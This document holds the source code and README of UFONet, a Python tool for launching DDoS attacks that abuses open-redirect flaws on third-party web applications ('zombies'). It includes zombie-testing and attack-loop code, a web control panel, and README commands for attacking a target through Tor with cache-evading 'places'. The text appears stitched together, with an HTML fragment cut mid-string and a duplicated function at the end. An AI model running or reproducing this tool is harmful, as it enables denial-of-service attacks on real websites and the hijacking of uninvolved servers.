It is written in <a href="https://www.python.org/" target="_blank">python</a> and distributed under license <a href="http://gplv3.fsf.org/" target="_blank">GPLv3</a>
+ Main project website: <a href="http://ufonet.sf.net" target="_blank">http://ufonet.sf.net</a>
+ Forum threads: <a href="https://forum.unsystem.net/category/churchofsecurity/ufonet" target="_blank">http://forum.unsystem.net</a></div> <div><a id="mH2" href="javascript:show('nb2');" style="text-decoration: none;" >+ How does it work?</a></div> <div class="nb" id="nb2" style="display: none;"> It works exploiting "Open Redirect" vectors on third party web applications.
You can read some info about what exploits on next links:
- <a href="http://cwe.mitre.org/data/definitions/601.html" target="_blank">CWE-601:Open Redirect</a>
- <a href="https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2" target="_blank">OWASP:URL Redirector Abuse</a>
You have a technical schema about an attacking scenario: <a href="http://ufonet.sf.net/ufonet/ufonet-schema.png" target="_blank">here</a>
Also, you can follow <a href="http://ufonet.sourceforge.net/ufonet/UFONet-v0.3-Abduction-English-GSICK.pdf" target="_blank">this link</a> to view some slides created on 2014</div> <div><a id="mH3" href="javascript:show('nb3');" style="text-decoration: none;" >+ How to start?</a></div> <div class="nb" id="nb3" style="display: none;"> All you need to start an attack is:
- a proxy (not required); to mask the origin of the attack (ex: <a href="https://www.torproject.org/" target="_blank">Tor</a>)
- a list of 'zombies'; to conduct their connections to your target
- a place; to efficiently hit your target</div> <div><a id="mH4" href="javascript:show('nb4');" style="text-decoration: none;" >+ Updating</a></div><div class="nb" id="nb4" style="display: none;">
This feature can be used ONLY if you have cloned UFONet from GitHub respository.
git clone https://github.com/epsylon/ufonet
To check your version you should launch, from shell:
./ufonet --update </div> <div><a id="mH5" href="javascript:show('nb5');" style="text-decoration: none;" >+ How can help?</a></div> <div class="nb" id="nb5" style="display: none;"> You can contribute on many different ways:
- Testing; use the tool and search for possible bugs a new ideas
- Coding; you can try to develop more features
- Promoting; talk about UFONet on the internet, events, hacklabs, etc
- Donating; money, objects, support, love ;-)
+ Bitcoin: 1Q63KtiLGzXiYA8XkWFPnWo7nKPWFr3nrc
+ Ecoin: 6enjPY7PZVq9gwXeVCxgJB8frsf4YFNzVp</div> <div><a id="mH6" href="javascript:show('nb6');" style="text-decoration: none" >+ Contact forms</a></div> <div class="nb" id="nb6" style="display: none;"> You can contact using:
- Email: <a href="mailto: [email protected]">[email protected]</a> [GPG:0xB8AC3776]
- IRC: irc.freenode.net / #ufonet
- Twitter: <a href="https://twitter.com/psytzsche" target="_blank">@psytzsche</a></div></pre>
</td>
</tr>
</table>
""" + self.pages["/footer"]
self.pages["/inspect"] = self.pages[
"/header"] + """<script language="javascript">
function Requests() {
var win_requests = window.open("requests","_blank","fulscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
}
function Start(){
target=document.getElementById("target").value
params="target="+escape(target)
runCommandX("cmd_inspect",params)
}
</script>
<script>loadXMLDoc()</script>
</head>
<body bgcolor="black" text="lime" style="font-family:Â Courier, 'Courier New', monospace;" >
<center>
<table cellpadding="38" cellspacing="38">
<tr>
<td>
<div class="ringMenu">
<ul>
<li class="main"><a href="inspect">Inspect</a></li>
<li class="top"><a href="help">Help</a></li>
<li class="right"><a href="botnet">Botnet</a></li>
<li class="bottom"><a href="attack">Attack</a></li>
<li class="left"><a href="gui">RETURN</a></li>
</ul>
</div>
</td>
<td>
<pre>
<u>Inspect for places</u>: <button onclick="Requests()">Configure requests</button>
<hr>
* Set URL <input type="text" name="target" id="target" size="30" placeholder="http(s)://">
<hr>
<button onClick=Start()>START!</button></pre>
</td>
</tr>
</table>
<hr>
<div id="cmdOut"></div>
""" + self.pages["/footer"]
self.pages["/lib.js"] = """function loadXMLDoc() {
var xmlhttp;
if (window.XMLHttpRequest) {
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
} else {
// code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 ) {
if(xmlhttp.status == 200){
document.getElementById("cmdOut").innerHTML = xmlhttp.responseText;
setTimeout("loadXMLDoc()", 3000);
}
}
}
xmlhttp.send();
}
function runCommandX(cmd,params) {
var xmlhttp;
if (window.XMLHttpRequest) {
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
} else {
// code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 ) {
if(xmlhttp.status == 200){
if(cmd.indexOf("?")!=-1){
s=cmd.split("?")
cmd=s[0]
params=s[1]
}
document.getElementById("cmdOut").innerHTML = xmlhttp.responseText;
//document.getElementById("cmdOut").scrollIntoView();
newcmd=cmd
if(newcmd=="cmd_list_army") { //do not refresh listing army
return;
} else {
if(newcmd=="cmd_test_army" || newcmd=="cmd_attack" || newcmd=="cmd_inspect" || newcmd=="cmd_search") newcmd=newcmd+"_update"
//do not refresh if certain text on response is found
if(newcmd.match(/update/) &&
(
xmlhttp.responseText.match(/Botnet updated/) ||
xmlhttp.responseText.match(/Biggest File/) ||
xmlhttp.responseText.match(/Not any zombie active/) ||
xmlhttp.responseText.match(/Your target looks OFFLINE/) ||
xmlhttp.responseText.match(/Unable to connect to target/) ||
xmlhttp.responseText.match(/Something wrong testing/) ||
xmlhttp.responseText.match(/Target url not valid/) ||
xmlhttp.responseText.match(/Attack completed/) ||
xmlhttp.responseText.match(/Bye/)
)
) return;
setTimeout(function(){runCommandX(newcmd,params)}, 3000);
return;}
}
}
}
if(typeof params != "undefined") cmd=cmd+"?"+params
xmlhttp.open("GET", cmd, true);
xmlhttp.send();
}
"""
self.pages["/requests"] = self.html_requests()
def create_options(self, args=None):
self.optionParser = UFONetOptions()
self.options = self.optionParser.get_options(args)
if not self.options:
return False
return self.options
def banner(self):
print '='*75, "\n"
print "888 888 8888888888 .d88888b. 888b 888 888 "
print "888 888 888 d88P" "Y888b 8888b 888 888 "
print "888 888 888 888 888 88888b 888 888 "
print "888 888 8888888 888 888 888Y88b 888 .d88b. 888888 "
print "888 888 888 888 888 888 Y88b888 d8P Y8b 888 "
print "888 888 888 888 888 888 Y88888 88888888 888 "
print "Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. "
print " 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888"
print self.optionParser.description, "\n"
print '='*75
def try_running(self, func, error, args=None):
options = self.options
args = args or []
try:
return func(*args)
except Exception as e:
print(error, "error")
if DEBUG:
traceback.print_exc()
def run(self, opts=None):
if opts:
options = self.create_options(opts)
self.set_options(options)
options = self.options
# check proxy options
proxy = options.proxy
if options.proxy:
try:
pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
m = re.search(pattern, proxy)
if m is None:
self.banner()
print ("\n[Error] - Proxy malformed!\n")
sys.exit(2)
except Exception:
self.banner()
print ("\n[Error] - Proxy malformed!\n")
sys.exit(2)
# test web 'zombie' servers -> show statistics
if options.test:
try:
self.banner()
zombies = self.extract_zombies()
test = self.testing(zombies)
except Exception:
print ("\n[Error] - Something wrong testing!\n")
# attack target -> exploit CSRF massively and connect all vulnerable servers to a target
if options.target:
try:
self.banner()
zombies = self.extract_zombies()
attack = self.attacking(zombies)
except Exception:
print ("\n[Error] - Something wrong attacking!\n")
def extract_zombies(self):
# extract targets from file (ex: 'zombies.txt')
options = self.options
if options.test:
try:
f = open(options.test)
zombies = f.readlines()
zombies = [ zombie.replace('\n','') for zombie in zombies ]
f.close()
if not zombies:
print "\n[Error] - Imposible to retrieve 'zombies' from the file."
sys.exit(2)
else:
return zombies
except:
if os.path.exists(options.test) == True:
print '\n[Error] - Cannot open:', options.test, "\n"
sys.exit(2)
else:
print '\n[Error] - Cannot found:', options.test, "\n"
sys.exit(2)
else:
try:
f = open('zombies.txt')
zombies = f.readlines()
zombies = [ zombie.replace('\n','') for zombie in zombies ]
f.close()
if not zombies:
print "\n[Error] - Imposible to retrieve 'zombies' from the file."
sys.exit(2)
else:
return zombies
except:
if os.path.exists('zombies.txt') == True:
print '\n[Error] - Cannot open:', 'zombies.txt', "\n"
sys.exit(2)
else:
print '\n[Error] - Cannot found:', 'zombies.txt', "\n"
sys.exit(2)
def update_zombies(self, zombies_ready):
# update targets on file (ex: 'zombies.txt')
options = self.options
if options.test:
f = open(options.test, "w")
for zombie in zombies_ready:
f.write(zombie + os.linesep)
f.close()
def connect_zombies(self, zombie):
# connect zombies and manage different options: HEAD, GET, POST,
# user-Agent, referer, timeout, retries, threads, delay..
options = self.options
c = pycurl.Curl()
if self.head == True:
c.setopt(pycurl.URL, zombie) # set 'zombie' target
c.setopt(pycurl.NOBODY,1) # use HEAD
if self.payload == True:
payload = zombie + "http://www.google.com" #XSS/CSRF payload
c.setopt(pycurl.URL, payload) # set 'zombie' target
c.setopt(pycurl.NOBODY,0) # use GET
if self.external == True:
external_service = "http://www.downforeveryoneorjustme.com/"
external = external_service + options.target
c.setopt(pycurl.URL, external) # external HEAD check before to attack
c.setopt(pycurl.NOBODY,0) # use GET
if self.attack_mode == True:
if options.place:
# use zombie's vector to connect to a target's place and add a random query to evade cache
random_hash = random.randint(1, 100000000)
url_attack = zombie + options.target + "/"+ options.place + "?" + str(random_hash)
else:
url_attack = zombie + options.target # Use zombie vector to connect to original target url
print url_attack
c.setopt(pycurl.URL, url_attack) # GET connection on target site
c.setopt(pycurl.NOBODY,0) # use GET
c.setopt(pycurl.HTTPHEADER, ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg', 'Connection: Keep-Alive', 'Content-type: application/x-www-form-urlencoded; charset=UTF-8', 'Cache-control: no-cache', 'Pragma: no-cache', 'Pragma-directive: no-cache', 'Cache-directive: no-cache', 'Expires: 0']) # set fake headers (important: no-cache)
c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
b = StringIO.StringIO()
c.setopt(pycurl.HEADERFUNCTION, b.write)
h = StringIO.StringIO()
c.setopt(pycurl.WRITEFUNCTION, h.write)
if options.agent: # set user-agent
c.setopt(pycurl.USERAGENT, options.agent)
else:
c.setopt(pycurl.USERAGENT, self.user_agent)
if options.referer: # set referer
c.setopt(pycurl.REFERER, options.referer)
else:
c.setopt(pycurl.REFERER, self.referer)
if options.proxy: # set proxy
c.setopt(pycurl.PROXY, options.proxy)
else:
c.setopt(pycurl.PROXY, '')
if options.timeout: # set timeout
c.setopt(pycurl.TIMEOUT, options.timeout)
c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
else:
c.setopt(pycurl.TIMEOUT, 30)
c.setopt(pycurl.CONNECTTIMEOUT, 30)
if options.delay: # set delay
self.delay = options.delay
else:
self.delay = 0
if options.retries: # set retries
self.retries = options.retries
else:
self.retries = 1
try: # try to connect
c.perform()
time.sleep(self.delay)
except: # try retries
for count in range(0, self.retries):
time.sleep(self.delay)
c.perform()
if count == self.retries:
print "\n[Error] - Imposible to connect. Aborting...\n"
sys.exit(2)
if self.head == True: # HEAD reply
code_reply = c.getinfo(pycurl.HTTP_CODE)
reply = b.getvalue()
if options.verbose:
print "Reply:"
print "\n", reply
return code_reply
if self.external == True: # External reply
external_reply = h.getvalue()
if options.verbose:
print "Reply:"
print "\n", external_reply
return external_reply
if self.payload == True: # Payloads reply
payload_reply = h.getvalue()
if options.verbose:
print "Reply:"
print "\n", payload_reply
return payload_reply
if self.attack_mode == True: # Attack mode reply
attack_reply = h.getvalue()
if options.verbose:
print "Reply:"
print "\n", attack_reply
return attack_reply
def testing(self, zombies):
# test CSRF vulnerabilities on webapps and show statistics
# HTTP HEAD check
print ("Are 'they' alive? :-) (HEAD Check):")
print '='*35
num_active_zombies = 0
num_failed_zombies = 0
active_zombies = []
army = 0
print "Trying:", len(zombies)
print '-'*21
for zombie in zombies:
t = urlparse(zombie)
if zombie.startswith("http://") or zombie.startswith("https://"):
# send HEAD connection
self.head = True
code_reply = str(self.connect_zombies(zombie))
self.head = False
if code_reply == "200" or code_reply == "302" or code_reply == "301" or code_reply == "401" or code_reply == "403" or code_reply == "405":
name_zombie = t.netloc
print "Zombie:", name_zombie
print "Status: Ok ["+ code_reply + "]"
num_active_zombies = num_active_zombies + 1
active_zombies.append(zombie)
elif code_reply == "404":
print "Zombie:", t.netloc
print "Status: Not Found ["+ code_reply + "]"
num_failed_zombies = num_failed_zombies + 1
else:
print "Zombie:", t.netloc
print "Status: Not Allowed ["+ code_reply + "]"
num_failed_zombies = num_failed_zombies + 1
else:
if self.options.verbose:
print "Reply:", "\n\nNothing!!!!!\n"
print "Zombie:", zombie
print "Status: Malformed!"
num_failed_zombies = num_failed_zombies + 1
print '-'*10
print '='*18
print "OK:", num_active_zombies, "Fail:", num_failed_zombies
print '='*18
if num_active_zombies == 0:
print "\n[INFO] - Update your 'zombies' list!\n"
sys.exit(2)
print '='*22
# check url parameter vectors
print ("Checking for payloads:")
print '='*22
print "Trying:", num_active_zombies
print '-'*21
zombies_ready = []
num_waiting_zombies = 0
num_disconnected_zombies = 0
for zombie in active_zombies:
t = urlparse(zombie)
name_zombie = t.netloc
payload_zombie = zombie
print "Vector:", payload_zombie
self.payload = True
payload_reply = str(self.connect_zombies(zombie))
self.payload = False
if "http://www.google.com" in payload_reply: #XSS/CSRF reply
num_waiting_zombies = num_waiting_zombies + 1
print "Status:", "Waiting..."
zombies_ready.append(zombie)
else:
num_disconnected_zombies = num_disconnected_zombies + 1
print "Status:", "Disconnected..."
army = army + 1
print '-'*10
print '='*18
print "OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies
print '='*18
print '='*18
# list of 'zombies' ready to attack
print ("List of 'zombies':")
print '='*18
num_active_zombie = 0
for z in zombies_ready:
t = urlparse(z)
name_zombie = t.netloc
num_active_zombie = num_active_zombie + 1
if self.options.verbose:
print "Zombie [", num_active_zombie, "]:", name_zombie
print '-'*18
print "Total Army:", num_active_zombie
print '-'*18
# update 'zombies' list
if num_active_zombie == 0:
print "\n[INFO] - You haven't any 'zombie'. Try to update your list!\n"
else:
update_reply = raw_input("Wanna update your list (Y/n)")
print '-'*25
if update_reply == "n" or update_reply == "N":
print "\nBye!\n"
else:
self.update_zombies(zombies_ready)
print "\n[INFO] - Botnet updated! ;-)\n"
def attacking(self, zombies):
# Perform a DDoS Web attack against a target, using XSS/CSRF vectors on third party machines (aka 'zombies')
target = self.options.target
if target.startswith("http://") or target.startswith("https://"):
print "Attacking: ", target
print '='*55, "\n"
# send XSS/CSRF injection
reply = self.injection(target, zombies)
else:
print "\n[Error] - Target url not valid!\n"
def injection(self, target, zombies):
options = self.options
head_check_here = False
head_check_external = False
print '='*21
print "Round: 'Is target up?'"
print '='*21
# send HEAD connection
self.head = True
try:
reply = self.connect_zombies(target)
if reply:
print "From here: YES"
head_check_here = True
else:
print "From here: NO"
head_check_here = False
except Exception:
print "\n[Error] - Cannot check from your connection, if target is up!\n"
print "From Here: NO"
head_check_here = False
self.head = False
print '-'*21
# check target on third party service (ex: http://www.downforeveryoneorjustme.com)
self.external = True
try:
external_reply = self.connect_zombies(target)
if "It's just you" in external_reply: # parse external service for correct reply
print "From exterior: YES"
head_check_external = True
else:
print "From exterior: NO"
head_check_external = False
except Exception:
print "\n[Error] - Cannot check from external services, if target is up!\n"
print "From exterior: NO"
head_check_external = False
self.external = False
print '-'*21, "\n"
# ask for start the attack
if head_check_here == True or head_check_external == True:
start_reply = raw_input("Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)")
print '-'*25
if start_reply == "y" or start_reply == "Y":
total_rounds = options.rounds # extract number of rounds
if total_rounds <= "0":
total_rounds = 1
num_round = 1
num_hits = 0
num_zombie = 1
# start to attack the target with each zombie
zombies = self.extract_zombies() # extract zombies from file
total_zombie = len(zombies)
for i in range(0, int(total_rounds)):
for zombie in zombies:
print '='*45
print "Zombie:", num_zombie, "| Round:", num_round, "| Total:", total_rounds
print '='*45
t = urlparse(zombie)
name_zombie = t.netloc
self.attack_mode = True
print "Name:", name_zombie
attack_reply = self.connect_zombies(zombie)
print "Status: Hit!"
num_hits = num_hits + 1
num_zombie = num_zombie + 1
if num_zombie > total_zombie:
num_zombie = 1
print '-'*10
num_round = num_round + 1
attack_mode = False
print '='*21
print "Total hits:", num_hits
print '='*21
print "\n[INFO] - Attack completed! ;-)\n"
else:
print "\nBye!\n"
else:
print "Your target is OFFLINE!?. Or you cannot reach it"
print '-'*25
print "\nBye!\n"
if __name__ == "__main__":
app = UFONet()
options = app.create_options()
if options:
app.set_options(options)
app.run()
---------------------------------------------------------------------------------------
UFONet - DDoS attacks via Web Abuse (XSS/CSRF) - 2013 - by psy
===========================================================================
###############################
# Project info
###############################
Website: http://ufonet.sf.net
IRC: irc.freenode.net - #ufonet
###############################
# Summary
###############################
UFONet - is a shell client designed to launch DDoS attacks against a target,
using CSRF/XSS vectors on third party web applications, like botnet.
It allows to use a proxy to manage 'zombies'.
###############################
# Installing
###############################
UFONet runs on many platforms. It requires Python and the following library:
- python-pycurl - Python bindings to libcurl
On Debian-based systems (ex: Ubuntu), run:
sudo apt-get install python-pycurl
###############################
# Testing botnet
###############################
Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. Urls of the
'zombies' should be like this:
http://target.com/check?uri=
After that, launch it:
./ufonet -t zombies.txt
At the end of the process, you will be asked if you want to update the list automatically
adding only 'vulnerable' web apps.
Wanna update your list (Y/n)
-------------
Examples:
+ with verbose: ./ufonet -t zombies.txt -v
+ with proxy TOR: ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"
###############################
# Attacking a target
###############################
Enter the target to attack, with the number of rounds that will be attacked:
./ufonet -a http://target.com -r 10
This will attack the target, with the list of 'zombies' that your provided on: "zombies.txt", a number
of 10 times for each 'zombie'. That means, that if you have a list of 1.000 'zombies', the program will
launch 1.000 'zombies' x 10 rounds = 10.000 'hits' to the target.
By default, if you don't put any round, it will apply only 1.
Additionally, you can choose a place to recharge on target's site. For example, a large image, a big size
file or a flash movie. In some scenarios where targets doesn't use cache systems, this will do the attack
more effective.
./ufonet -a http://target.com -b "/images/big_size_image.jpg"
-------------
Examples:
+ with verbose: ./ufonet -a http://target.com -r 10 -v
+ with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
+ with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
def create_options(self, args=None):
self.optionParser = UFONetOptions()
self.options = self.optionParser.get_options(args)
if not self.options:
return False
return self.options
